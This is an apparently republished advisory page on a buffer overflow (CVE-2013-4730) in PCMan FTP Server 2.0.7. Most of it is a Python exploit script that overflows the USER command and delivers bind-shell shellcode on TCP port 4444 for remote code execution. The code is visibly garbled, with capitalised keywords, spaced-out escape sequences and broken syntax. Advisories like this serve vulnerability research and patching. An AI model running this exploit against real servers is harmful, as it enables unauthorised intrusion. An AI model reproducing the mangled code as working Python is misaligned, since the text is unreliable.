PCMan's FTP Server 2.0.7 Buffer Overflow Vulnerability

Source: Internet
Author: User
Tags signal handler

Release date:
Updated on:

Affected Systems:
PCMan FTP Server 2.0.7
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65289,65299
CVE (CAN) ID: CVE-2013-4730
 
PCMan's FTP Server is a simple and easy-to-use basic FTP Server.
 
The buffer overflow vulnerability exists in the implementation of PCMan's FTP Server 2.0.7, which is caused by the well-constructed USER, PASS, STOR, ABOR, and CWD commands, the user input is not properly verified, which can cause remote attackers to cause buffer overflow, resulting in DOS or arbitrary code execution.
 
<* Source: Jacob Holcomb

Link: http://osvdb.org/show/osvdb/94624
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/env python

Import signal
From time import sleep
From socket import *
From sys import exit, exc_info

#
# Title ************************ PCMan FTP Server v2.0.7 Remote Root Shell Exploit-USER Command
# Discovered and Reported ***** June 2013
# Discovered/Exploited By ***** Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory ************** http://infosec42.blogspot.com/
# Software ********************* PCMan FTP Server v2.0.7 (Listens on TCP/21)
# Tested Commands ************** USER (Other commands were not tested and may be vulnerable)
# CVE ************************** PCMan FTP Server v2.0.7 Buffer Overflow: Pending
#


Def sigHandle (signum, frm): # Signal handler

Print "\ n [!] Cleaning up the exploit... [!] \ N"
Sleep (1)
Exit (0)


Def targServer ():

While True:
Try:
Server = inet_aton (raw_input ("\ n [*] Please enter the IPv4 address of the PCMan FTP Server: \ n> "))
Server = inet_ntoa (server)
Break
Except t:
Print "\ n [!] Error: Please enter a valid IPv4 address. [!] \ N"
Sleep (1)
Continue

Return server


Def main ():

Print ("" \ n [*] Title ************************* PCMan FTP Server v2.0.7 Remote root Shell Exploit-USER Command
[*] Discovered and Reported ***** June 2013
[*] Discovered/Exploited By ****** Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
[*] Exploit/Advisory ************** http://infosec42.blogspot.com/
[*] Software ********************* PCMan FTP Server v2.0.7 (Listens on TCP/21)
[*] Tested Commands ************** USER (Other commands were not tested and may be vulnerable)
[*] CVE ************************* PCMan FTP Server v2.0.7 Buffer Overflow: pending """)
Signal. signal (signal. SIGINT, sigHandle) # Setting signal handler for ctrl + c
Victim = targServer ()
Port = int (21)
Cmd = "USER" # Vulnerable command
JuNk = "\ x42" * 2004
# KERNEL32.dll 7CA58265-JMP ESP
Ret = "\ x65 \ x82 \ xA5 \ x7C"
NOP = "\ x90" * 50

#348 Bytes Bind Shell Port TCP/4444
# Msfpayload windows/shell_bind_tcp EXITFUNC = thread LPORT = 4444 R |
# Msfencode-e x86/shikata_ga_nai-c 1-B "\ x0d \ x0a \ x00 \ xf1" R
Shellcode = "\ xdb \ xcc \ xba \ x40 \ xb6 \ x7d \ xba \ xd9 \ x74 \ x24 \ xf4 \ x58 \ x29 \ xc9"
Shellcode + = "\ xb1 \ x50 \ x31 \ x50 \ x18 \ x03 \ x50 \ x18 \ x83 \ xe8 \ xbc \ x54 \ x88 \ x46"
Shellcode + = "\ x56 \ x72 \ x3e \ x5f \ x5f \ x7b \ x3e \ x60 \ xff \ x0f \ xad \ xbb \ xdb \ x84"
Shellcode + = "\ x6b \ xf8 \ xa8 \ xe7 \ x76 \ x78 \ xaf \ xf8 \ xf2 \ x37 \ xb7 \ x8d \ x5a \ xe8"
Shellcode + = "\ xc6 \ x7a \ x2d \ x63 \ xfc \ xf7 \ xaf \ x9d \ xcd \ xc7 \ x29 \ xcd \ xa9 \ x08"
Shellcode + = "\ x3d \ x09 \ x42 \ xb3 \ x14 \ xb0 \ xb8 \ x38 \ x2d \ x60 \ x1b \ xe9 \ x27"
Shellcode + = "\ x6d \ xe8 \ xb6 \ xe3 \ x6c \ x04 \ x2e \ x67 \ x62 \ x91 \ x24 \ x28 \ x66 \ x24"
Shellcode + = "\ xd0 \ xd4 \ xba \ xad \ xaf \ xb7 \ xe6 \ xad \ xce \ x84 \ xd7 \ x16 \ x74 \ x80"
Shellcode + = "\ x54 \ x99 \ xfe \ xd6 \ x56 \ x52 \ xcb \ xef \ x31 \ xfb \ x4d \ x98"
Shellcode + = "\ x3f \ xb5 \ x7f \ xb4 \ x10 \ xb5 \ xa9 \ x22 \ xc2 \ x2f \ x3d \ x98 \ xd6 \ xc7"
Shellcode + = "\ xca \ xad \ x24 \ x47 \ x60 \ xad \ x99 \ x1f \ x43 \ xbc \ xe6 \ xdb \ x03 \ xc0"
Shellcode + = "\ xc1 \ x43 \ x2a \ xdb \ x88 \ xfa \ xc1 \ x2c \ x57 \ xa8 \ x73 \ x2f \ xa8 \ x82"
Shellcode + = "\ xeb \ xf6 \ x5f \ xd6 \ x46 \ x5f \ x9f \ xce \ xcb \ x33 \ x0c \ xbc \ xb8 \ xf0"
Shellcode + = "\ xe1 \ x01 \ x6d \ x08 \ xd5 \ xe0 \ xf9 \ xe7 \ x8a \ x8a \ xaa \ x8e \ xd2 \ xc6"
Shellcode + = "\ x24 \ x35 \ x0e \ x99 \ x73 \ x62 \ xd0 \ x8f \ x11 \ x9d \ x7f \ x65 \ x1a \ x4d"
Shellcode + = "\ x17 \ x21 \ x49 \ x40 \ x01 \ x7e \ x6e \ x4b \ x82 \ xd4 \ x6f \ xa4 \ x4d \ x32"
Shellcode + = "\ xc6 \ xc3 \ xc7 \ xeb \ x27 \ x1d \ x87 \ x47 \ x83 \ xf7 \ xd7 \ xb8 \ xb8 \ x90"
Shellcode + = "\ xc0 \ x40 \ x78 \ x19 \ x58 \ x4c \ x52 \ x8f \ x99 \ x62 \ x3c \ x5a \ x02 \ xe5"
Shellcode + = "\ xa8 \ xf9 \ xa7 \ x60 \ xcd \ x94 \ x67 \ x2a \ x24 \ xa5 \ x01 \ x2b \ x5c \ x71"
Shellcode + = "\ x9b \ x56 \ x91 \ xb9 \ x68 \ x3c \ x2f \ x7b \ xa2 \ xbf \ x8d \ x50 \ x2f \ xb2"
Shellcode + = "\ x6b \ x91 \ xe4 \ x66 \ x20 \ x89 \ x88 \ x86 \ x85 \ x5c \ x92 \ x02 \ xad \ x9f"
Shellcode + = "\ xba \ xb6 \ x7a \ x32 \ x12 \ x18 \ xd5 \ xd8 \ x95 \ xcb \ x84 \ x49 \ xc7 \ x14"
Shellcode + = "\ xf6 \ x1a \ x4a \ x33 \ xf3 \ x14 \ xc7 \ x3b \ x2d \ xc2 \ x17 \ x3c \ xe6 \ xec"
Shellcode + = "\ x38 \ x48 \ x5f \ xef \ x3a \ x8b \ x3b \ xf0 \ xeb \ x46 \ x3c \ xde \ x7c \ x88"
Shellcode + = "\ x0c \ x3f \ x1c \ x05 \ x6f \ x16 \ x22 \ x79"

Sploit = Cmd + JuNk + ret + NOP + shellcode
Sploit + = "\ x42" * (2992-len (NOP + shellcode) + "\ r \ n"

Try:
Print "\ n [*] Creating network socket ."
Net_sock = socket (AF_INET, SOCK_STREAM)
Except t:
Print "\ n [!] There was an error creating the network socket. [!] \ N % s \ n "% exc_info ()
Sleep (1)
Exit (0)

Try:
Print "[*] Connecting to PCMan FTP Server @ % s on port TCP/% d." % (victim, port)
Net_sock.connect (victim, port ))
Except t:
Print "\ n [!] There was an error connecting to % s. [!] \ N % s \ n "% (victim, exc_info ())
Sleep (1)
Exit (0)

Try:
Print "[*] Attempting to exploit the ftp user command.
[*] Sending 1337 ro0t Sh3ll exploit to % s on TCP port % d.
[*] Payload Length: % d bytes. "" % (victim, port, len (sploit ))
Net_sock.send (sploit)
Sleep (1)
Except t:
Print "\ n [!] There was an error sending the 1337 ro0t Sh3ll exploit to % s [!] \ N % s \ n "% (victim, exc_info ())
Sleep (1)
Exit (0)

Try:
Print "[*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup. \ n """
Net_sock.close ()
Except t:
Print "\ n [!] There was an error closing the network socket. [!] \ N % s \ n "% exc_info ()
Sleep (1)
Exit (0)


If _ name _ = "_ main __":
Main ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
PCMan
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Https://files.secureserver.net/1sMltFOsytirTG

This article permanently updates the link address:

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.